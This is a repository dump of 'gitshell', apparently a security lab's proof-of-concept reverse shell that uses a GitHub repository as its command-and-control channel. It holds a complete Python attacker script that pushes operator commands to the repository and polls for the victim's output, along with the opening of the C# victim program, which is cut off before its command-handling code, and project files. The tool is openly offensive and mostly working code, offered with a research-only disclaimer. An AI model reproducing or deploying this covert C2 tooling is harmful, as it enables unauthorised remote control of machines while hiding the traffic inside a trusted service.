├── images
└── ExampleShell.png
├── GitShellVictim
├── FodyWeavers.xml
├── App.config
├── packages.config
├── Properties
│ └── AssemblyInfo.cs
├── GitShellVictim.csproj
└── Program.cs
├── GitShellAttacker
├── readme.md
└── gitshell-attacker.py
├── GitShellVictim.sln
├── README.md
├── .gitignore
└── LICENSE
/images/ExampleShell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cornerpirate/gitshell/HEAD/images/ExampleShell.png
--------------------------------------------------------------------------------
/GitShellVictim/FodyWeavers.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/GitShellAttacker/readme.md:
--------------------------------------------------------------------------------
1 | Execute these commands to install dependencies:
2 |
3 | ```bash
4 | pip install gitpython
5 | pip install YURL
6 | pip install pexpect
7 | ```
8 |
9 |
--------------------------------------------------------------------------------
/GitShellVictim/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/GitShellVictim/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/GitShellVictim.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.27130.2027
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "GitShellVictim", "GitShellVictim\GitShellVictim.csproj", "{0B97D7E5-B18A-40D7-9B32-18A29C8E842B}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {0B97D7E5-B18A-40D7-9B32-18A29C8E842B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {0B97D7E5-B18A-40D7-9B32-18A29C8E842B}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {0B97D7E5-B18A-40D7-9B32-18A29C8E842B}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {0B97D7E5-B18A-40D7-9B32-18A29C8E842B}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {A9808515-9289-4748-BDD1-95E992368AF8}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # gitshell
2 | A PoC .net shell which uses a GitHub.com repository for the communication channel.
3 |
4 | # Gasp at it in action!
5 |
6 | Showing a victim executing a shell and attacker executing commands:
7 |
8 | 
9 |
10 | For more information on how it all hangs together please review the companion blog post from SecarmaLabs over here:
11 |
12 | https://blog.secarma.co.uk/labs/git-shell-proof-of-concept
13 |
14 | # GitShellVictim
15 |
16 | Clone down the repository and then open "GitShellVictim.sln" inside Visual Studio 2017. You can then read the source or compile the binary yourself.
17 |
18 | There is a version of the binary in the "Debug" folder already. However, why would you trust that a hacker like me has given you the actual Binary? I mean, I did... But... Read the code and compile your own. Maybe you don't want all commits to your repository to be by @cornerpirate? You can fix that in the code if you want to.
19 |
20 | # GitShellAttacker
21 |
22 | This folder contains the python script used on the attacker's side. This has only been tested on Kali and should work if you install the dependencies listed in Readme.md within this folder.
23 |
24 | # Disclaimer
25 |
26 | This is for research purposes only. Do not use this in any situation where you are unauthorised to do so.
--------------------------------------------------------------------------------
/GitShellVictim/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("GitShellVictim")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("GitShellVictim")]
13 | [assembly: AssemblyCopyright("Copyright © 2018")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("0b97d7e5-b18a-40d7-9b32-18a29c8e842b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/GitShellVictim/GitShellVictim.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Debug
7 | AnyCPU
8 | {0B97D7E5-B18A-40D7-9B32-18A29C8E842B}
9 | Exe
10 | GitShellVictim
11 | GitShellVictim
12 | v4.6.1
13 | 512
14 | true
15 |
16 |
17 |
18 |
19 | AnyCPU
20 | true
21 | full
22 | false
23 | bin\Debug\
24 | DEBUG;TRACE
25 | prompt
26 | 4
27 |
28 |
29 | AnyCPU
30 | pdbonly
31 | true
32 | bin\Release\
33 | TRACE
34 | prompt
35 | 4
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 | ..\packages\Costura.Fody.2.0.0\lib\net452\Costura.dll
44 |
45 |
46 | ..\packages\LibGit2Sharp.0.25.0\lib\netstandard2.0\LibGit2Sharp.dll
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 | Designer
64 |
65 |
66 |
67 |
68 |
69 |
70 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
--------------------------------------------------------------------------------
/GitShellAttacker/gitshell-attacker.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import git # Interacting with git
3 | from git import Repo # Interacting with git Repositories
4 | import shutil # for conveniently deleting local folder
5 | import hashlib # for getting hash of file
6 | import pexpect # for interacting with shell
7 | from subprocess import Popen, PIPE, STDOUT
8 | import commands
9 | import argparse
10 | import sys
11 | import os
12 | import time
13 |
14 | def main():
15 |
16 | if(os.path.exists(args.path)):
17 | answer = raw_input("path already exists Should I delete that folder and all its contents? [y/n]? ")
18 | if(answer == "y"):
19 | shutil.rmtree(args.path, ignore_errors=True) # rm -r
20 |
21 | # Git Clone - copy down the target repo
22 | print "Cloning " + args.url + " down to " + args.path
23 | Repo.clone_from(args.url, args.path)
24 |
25 | localrepo = git.Repo(args.path) # object ref to local path
26 | infile = os.path.join(args.path, 'in.txt') # full path to in.txt
27 | outfile = os.path.join(args.path, 'out.txt') # full path to out.txt
28 |
29 | print "infile: " + infile
30 | print "outfile: " + outfile
31 |
32 | # Being in the git folder is pretty useful throughout.
33 | os.chdir(args.path)
34 |
35 | # calculate the checksum of the outfile currently
36 | outhash = hashlib.md5(open(outfile, 'rb').read()).hexdigest()
37 | print "outhash: " + outhash
38 |
39 | try:
40 | setupAuthentication()
41 | print "Have set your GitHub authentication token for you!"
42 | except:
43 | print "User was already authenticated to GitHub"
44 |
45 | while True:
46 | # git pull - check for changes
47 | #print "git pull - synching remote to local"
48 | #localrepo.remotes.origin.pull()
49 | gitPull(localrepo)
50 |
51 | # check if outfile has changed
52 | #if(outhash != hashlib.md5(open(outfile, 'rb').read()).hexdigest()):
53 | # display updated output and update outhash
54 | displayOutput(outfile)
55 | outhash = hashlib.md5(open(outfile, 'rb').read()).hexdigest()
56 |
57 | # prompt user for input, this blocks the loop on this side until attacker issues command
58 | cmd = raw_input("# ")
59 | if(cmd != ''):
60 | # save cmd into "in.txt"
61 | setIn(infile, cmd)
62 | # git commit - commit changs to "in.txt" in local repo
63 | gitCommit(localrepo, infile)
64 | # git push - push to remote
65 | gitPush(localrepo)
66 | time.sleep(5)
67 | # wait for victim to commit response.
68 | getResponse()
69 | else:
70 | # delay for 2 seconds
71 | print "Waiting 5 seconds"
72 | time.sleep(5)
73 |
74 |
75 | def getResponse():
76 | #print "== getResponse "
77 | count = 0
78 | while True:
79 | count = count+1
80 | print "checking remote repo for updates loop #" + str(count)
81 | status, output = commands.getstatusoutput("git fetch")
82 | #print output
83 | if(len(output) != 0):
84 | print "Victim updated repo!"
85 | return # exit getResponse
86 |
87 | # This executes a "push" request to trigger a github authentication prompt.
88 | # It then enters the credentials for you.
89 | # Token authentcation works with the token as the username and a blank password.
90 | def setupAuthentication():
91 | # We need to setup authentication for github.
92 | # This one tells git to save credentials
93 |
94 | os.system("git config credential.helper store")
95 | print "credential.helper store executed"
96 | child = pexpect.spawn('git push origin master')
97 | child.expect("Username*", timeout=2)
98 | child.sendline(args.token)
99 | child.expect("Password*", timeout=2)
100 | child.sendline("")
101 | child.expect(pexpect.EOF)
102 |
103 | # git push - pushes local changes up to remote
104 | def gitPush(localrepo):
105 | #print "== gitPush"
106 | #localrepo.remotes.origin.push()
107 | #os.system("git push origin master")
108 | proc = Popen(['git', 'push', 'origin','master'], stdout=PIPE, stderr=STDOUT)
109 | status, output = commands.getstatusoutput("git push origin master")
110 |
111 | # git commit - commits the latest "in.txt" locally
112 | def gitCommit(localrepo, infile):
113 | #print "== gitCommit"
114 | #os.system("git add in.txt")
115 | status, output = commands.getstatusoutput("git add in.txt")
116 | #print output
117 | status, output = commands.getstatusoutput("git commit -m 'attacker'")
118 | #print output
119 |
120 | #proc = Popen('cd ' + args.path + '/ && git add in.txt', stdout=PIPE, stderr=STDOUT)
121 | #proc = Popen('cd ' + args.path + '/ && git commit -m \'attacker\'', stdout=PIPE, stderr=STDOUT)
122 | #os.system("git commit -m 'attacker'")
123 |
124 | def gitPull(localrepo):
125 | #proc = Popen(['git', 'pull'], stdout=PIPE, stderr=STDOUT)
126 | # print "== gitPull"
127 | status, output = commands.getstatusoutput("git pull")
128 | # print output
129 |
130 |
131 | # display the contents of "out.txt"
132 | # this may have crypto to deal with soon.
133 | def displayOutput(outfile):
134 | #print "== displayOutput"
135 | with open(outfile) as f:
136 | print f.read()
137 |
138 | # save the attacker's command into "in.txt"
139 | # this may have crypto to deal with soon.
140 | def setIn(infile, cmd):
141 | f = open(infile,'w')
142 | f.write(cmd)
143 | f.close()
144 |
145 | ################################################################################
146 | ################################################################################
147 |
148 | def usage():
149 | return "== Example Usage ==\n\n" + sys.argv[0] + " -u https://github.com/username/repo -p /tmp/gitshell -t 11111111111111111111111111"
150 |
151 | # Defining the arguments and parsing the args.
152 | parser = argparse.ArgumentParser(
153 | description='Using a GitHub repository to deliver a reverse shell',
154 | epilog=usage(),
155 | formatter_class=argparse.RawDescriptionHelpFormatter)
156 | parser._action_groups.pop()
157 |
158 | required = parser.add_argument_group('required arguments')
159 |
160 | required.add_argument("-u", "--url", type=str, help="URL to github repo you will communicate through", required=True)
161 | required.add_argument("-p", "--path",type=str, help="Local path to clone repo to", required=True)
162 | required.add_argument("-t", "--token",type=str, help="GitHub authentication token", required=True)
163 |
164 | try:
165 |
166 | args = parser.parse_args()
167 |
168 | except:
169 | #print sys.exc_info()
170 | #parser.print_help()
171 | sys.exit(0)
172 |
173 | main()
174 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Build results
17 | [Dd]ebug/
18 | [Dd]ebugPublic/
19 | [Rr]elease/
20 | [Rr]eleases/
21 | x64/
22 | x86/
23 | bld/
24 | [Bb]in/
25 | [Oo]bj/
26 | [Ll]og/
27 |
28 | # Visual Studio 2015/2017 cache/options directory
29 | .vs/
30 | # Uncomment if you have tasks that create the project's static files in wwwroot
31 | #wwwroot/
32 |
33 | # Visual Studio 2017 auto generated files
34 | Generated\ Files/
35 |
36 | # MSTest test Results
37 | [Tt]est[Rr]esult*/
38 | [Bb]uild[Ll]og.*
39 |
40 | # NUNIT
41 | *.VisualState.xml
42 | TestResult.xml
43 |
44 | # Build Results of an ATL Project
45 | [Dd]ebugPS/
46 | [Rr]eleasePS/
47 | dlldata.c
48 |
49 | # Benchmark Results
50 | BenchmarkDotNet.Artifacts/
51 |
52 | # .NET Core
53 | project.lock.json
54 | project.fragment.lock.json
55 | artifacts/
56 |
57 | # StyleCop
58 | StyleCopReport.xml
59 |
60 | # Files built by Visual Studio
61 | *_i.c
62 | *_p.c
63 | *_h.h
64 | *.ilk
65 | *.meta
66 | *.obj
67 | *.iobj
68 | *.pch
69 | *.pdb
70 | *.ipdb
71 | *.pgc
72 | *.pgd
73 | *.rsp
74 | *.sbr
75 | *.tlb
76 | *.tli
77 | *.tlh
78 | *.tmp
79 | *.tmp_proj
80 | *_wpftmp.csproj
81 | *.log
82 | *.vspscc
83 | *.vssscc
84 | .builds
85 | *.pidb
86 | *.svclog
87 | *.scc
88 |
89 | # Chutzpah Test files
90 | _Chutzpah*
91 |
92 | # Visual C++ cache files
93 | ipch/
94 | *.aps
95 | *.ncb
96 | *.opendb
97 | *.opensdf
98 | *.sdf
99 | *.cachefile
100 | *.VC.db
101 | *.VC.VC.opendb
102 |
103 | # Visual Studio profiler
104 | *.psess
105 | *.vsp
106 | *.vspx
107 | *.sap
108 |
109 | # Visual Studio Trace Files
110 | *.e2e
111 |
112 | # TFS 2012 Local Workspace
113 | $tf/
114 |
115 | # Guidance Automation Toolkit
116 | *.gpState
117 |
118 | # ReSharper is a .NET coding add-in
119 | _ReSharper*/
120 | *.[Rr]e[Ss]harper
121 | *.DotSettings.user
122 |
123 | # JustCode is a .NET coding add-in
124 | .JustCode
125 |
126 | # TeamCity is a build add-in
127 | _TeamCity*
128 |
129 | # DotCover is a Code Coverage Tool
130 | *.dotCover
131 |
132 | # AxoCover is a Code Coverage Tool
133 | .axoCover/*
134 | !.axoCover/settings.json
135 |
136 | # Visual Studio code coverage results
137 | *.coverage
138 | *.coveragexml
139 |
140 | # NCrunch
141 | _NCrunch_*
142 | .*crunch*.local.xml
143 | nCrunchTemp_*
144 |
145 | # MightyMoose
146 | *.mm.*
147 | AutoTest.Net/
148 |
149 | # Web workbench (sass)
150 | .sass-cache/
151 |
152 | # Installshield output folder
153 | [Ee]xpress/
154 |
155 | # DocProject is a documentation generator add-in
156 | DocProject/buildhelp/
157 | DocProject/Help/*.HxT
158 | DocProject/Help/*.HxC
159 | DocProject/Help/*.hhc
160 | DocProject/Help/*.hhk
161 | DocProject/Help/*.hhp
162 | DocProject/Help/Html2
163 | DocProject/Help/html
164 |
165 | # Click-Once directory
166 | publish/
167 |
168 | # Publish Web Output
169 | *.[Pp]ublish.xml
170 | *.azurePubxml
171 | # Note: Comment the next line if you want to checkin your web deploy settings,
172 | # but database connection strings (with potential passwords) will be unencrypted
173 | *.pubxml
174 | *.publishproj
175 |
176 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
177 | # checkin your Azure Web App publish settings, but sensitive information contained
178 | # in these scripts will be unencrypted
179 | PublishScripts/
180 |
181 | # NuGet Packages
182 | *.nupkg
183 | # The packages folder can be ignored because of Package Restore
184 | **/[Pp]ackages/*
185 | # except build/, which is used as an MSBuild target.
186 | !**/[Pp]ackages/build/
187 | # Uncomment if necessary however generally it will be regenerated when needed
188 | #!**/[Pp]ackages/repositories.config
189 | # NuGet v3's project.json files produces more ignorable files
190 | *.nuget.props
191 | *.nuget.targets
192 |
193 | # Microsoft Azure Build Output
194 | csx/
195 | *.build.csdef
196 |
197 | # Microsoft Azure Emulator
198 | ecf/
199 | rcf/
200 |
201 | # Windows Store app package directories and files
202 | AppPackages/
203 | BundleArtifacts/
204 | Package.StoreAssociation.xml
205 | _pkginfo.txt
206 | *.appx
207 |
208 | # Visual Studio cache files
209 | # files ending in .cache can be ignored
210 | *.[Cc]ache
211 | # but keep track of directories ending in .cache
212 | !*.[Cc]ache/
213 |
214 | # Others
215 | ClientBin/
216 | ~$*
217 | *~
218 | *.dbmdl
219 | *.dbproj.schemaview
220 | *.jfm
221 | *.pfx
222 | *.publishsettings
223 | orleans.codegen.cs
224 |
225 | # Including strong name files can present a security risk
226 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
227 | #*.snk
228 |
229 | # Since there are multiple workflows, uncomment next line to ignore bower_components
230 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
231 | #bower_components/
232 |
233 | # RIA/Silverlight projects
234 | Generated_Code/
235 |
236 | # Backup & report files from converting an old project file
237 | # to a newer Visual Studio version. Backup files are not needed,
238 | # because we have git ;-)
239 | _UpgradeReport_Files/
240 | Backup*/
241 | UpgradeLog*.XML
242 | UpgradeLog*.htm
243 | ServiceFabricBackup/
244 | *.rptproj.bak
245 |
246 | # SQL Server files
247 | *.mdf
248 | *.ldf
249 | *.ndf
250 |
251 | # Business Intelligence projects
252 | *.rdl.data
253 | *.bim.layout
254 | *.bim_*.settings
255 | *.rptproj.rsuser
256 |
257 | # Microsoft Fakes
258 | FakesAssemblies/
259 |
260 | # GhostDoc plugin setting file
261 | *.GhostDoc.xml
262 |
263 | # Node.js Tools for Visual Studio
264 | .ntvs_analysis.dat
265 | node_modules/
266 |
267 | # Visual Studio 6 build log
268 | *.plg
269 |
270 | # Visual Studio 6 workspace options file
271 | *.opt
272 |
273 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
274 | *.vbw
275 |
276 | # Visual Studio LightSwitch build output
277 | **/*.HTMLClient/GeneratedArtifacts
278 | **/*.DesktopClient/GeneratedArtifacts
279 | **/*.DesktopClient/ModelManifest.xml
280 | **/*.Server/GeneratedArtifacts
281 | **/*.Server/ModelManifest.xml
282 | _Pvt_Extensions
283 |
284 | # Paket dependency manager
285 | .paket/paket.exe
286 | paket-files/
287 |
288 | # FAKE - F# Make
289 | .fake/
290 |
291 | # JetBrains Rider
292 | .idea/
293 | *.sln.iml
294 |
295 | # CodeRush personal settings
296 | .cr/personal
297 |
298 | # Python Tools for Visual Studio (PTVS)
299 | __pycache__/
300 | *.pyc
301 |
302 | # Cake - Uncomment if you are using it
303 | # tools/**
304 | # !tools/packages.config
305 |
306 | # Tabs Studio
307 | *.tss
308 |
309 | # Telerik's JustMock configuration file
310 | *.jmconfig
311 |
312 | # BizTalk build output
313 | *.btp.cs
314 | *.btm.cs
315 | *.odx.cs
316 | *.xsd.cs
317 |
318 | # OpenCover UI analysis results
319 | OpenCover/
320 |
321 | # Azure Stream Analytics local run output
322 | ASALocalRun/
323 |
324 | # MSBuild Binary and Structured Log
325 | *.binlog
326 |
327 | # NVidia Nsight GPU debugger configuration file
328 | *.nvuser
329 |
330 | # MFractors (Xamarin productivity tool) working folder
331 | .mfractor/
332 |
333 | # Local History for Visual Studio
334 | .localhistory/
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/GitShellVictim/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 | using LibGit2Sharp;
7 | using System.IO;
8 | using System.Threading;
9 | using System.Security.Cryptography;
10 | using System.Net;
11 |
12 | namespace GitShellVictim
13 | {
14 | class Program
15 | {
16 | public static string localPath = ".\\repo";
17 | public static string inFile = localPath + "\\in.txt";
18 | public static string outFile = localPath + "\\out.txt";
19 |
20 | // Repo we will use to communicate through.
21 | public static string remotePath = "";
22 | // Generated via https://github.com/settings/tokens
23 | // For gitshells user account.
24 | public static string accessToken = "";
25 |
26 |
27 | /**
28 | * Prints the message in friendly green and then resets the colours
29 | */
30 | static void print_good(string msg) {
31 | Console.ForegroundColor = ConsoleColor.Green;
32 | Console.WriteLine(msg);
33 | Console.ResetColor();
34 | }
35 |
36 | /**
37 | * Prints the message in friendly green and then resets the colours
38 | */
39 | static void print_bad(string msg) {
40 | Console.ForegroundColor = ConsoleColor.Red;
41 | Console.WriteLine(msg);
42 | Console.ResetColor();
43 | }
44 |
45 | /**
46 | * Show welcome banner to our victim!
47 | */
48 | static void welcome_banner(){
49 | var welcome = @"
50 | ____ _ _
51 | / ___| ___ ___ __ _ _ __ _ __ ___ __ _| | __ _| |__ ___
52 | \___ \ / _ \/ __/ _` | '__| '_ ` _ \ / _` | | / _` | '_ \/ __|
53 | ___) | __/ (_| (_| | | | | | | | | (_| | |__| (_| | |_) \__ \
54 | |____/ \___|\___\__,_|_| |_| |_| |_|\__,_|_____\__,_|_.__/|___/
55 | ";
56 | Console.WriteLine(welcome) ;
57 | Console.WriteLine("============================================") ;
58 | Console.WriteLine("GitShellVictim - v 0.0.1");
59 | Console.WriteLine("============================================") ;
60 | }
61 |
62 |
63 | static void Main(string[] args)
64 | {
65 |
66 | // Welcome our victim
67 | welcome_banner();
68 |
69 | //var configuration = Configuration;
70 |
71 | //Console.WriteLine(configuration.Get("http.proxy"));
72 | //Console.WriteLine(configuration.Get("https.proxy"));
73 |
74 | // Check for proxy settings, if IE has default this will grab them
